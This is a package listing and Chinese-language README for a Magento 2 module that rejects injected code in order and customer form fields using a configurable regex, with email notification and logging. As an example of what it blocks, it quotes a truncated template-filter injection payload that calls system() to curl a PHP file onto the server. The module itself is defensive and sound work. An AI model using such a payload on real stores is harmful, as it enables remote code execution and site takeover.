wapone / module-input-fields-validator
针对输入字段验证的定制化Magento 2模块。
1.2.0
2024-08-23 13:20 UTC
Requires
- php: ^7||^8
- magento/framework: *
README
扩展描述
禁止在以下Magento 2表单中通过API或WEB请求注入随机代码:订单创建、客户创建、客户姓名更新、客户地址更新
随机代码如下
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS....
拒绝机制基于一个可配置的正则表达式。
默认正则表达式为 '/[{}<>%]/' 以拒绝如:{ } < > % 等字符
还可以配置仅用于姓氏和名字字段验证的字符数限制。
配置
配置部分
- 启用:启用/禁用模块;
- 正则表达式:拒绝输入值的正则表达式;
- 字符限制:仅用于姓氏和名字字段验证的字符数限制;
- 地区字段验证:启用/禁用地区字段的验证。
通知部分
- 启用无效字段结果通知:启用/禁用无效字段结果通知;
- 无效字段结果通知的电子邮件地址:接收无效字段结果的电子邮件地址。
通知
该扩展提供了在流程结束时将电子邮件发送到可配置地址以通知无效字段结果的可能性。
日志
日志文件位于路径:/var/log/wapone_input_fields_validator.log
使用Composer安装(推荐)
composer require wapone/module-input-fields-validator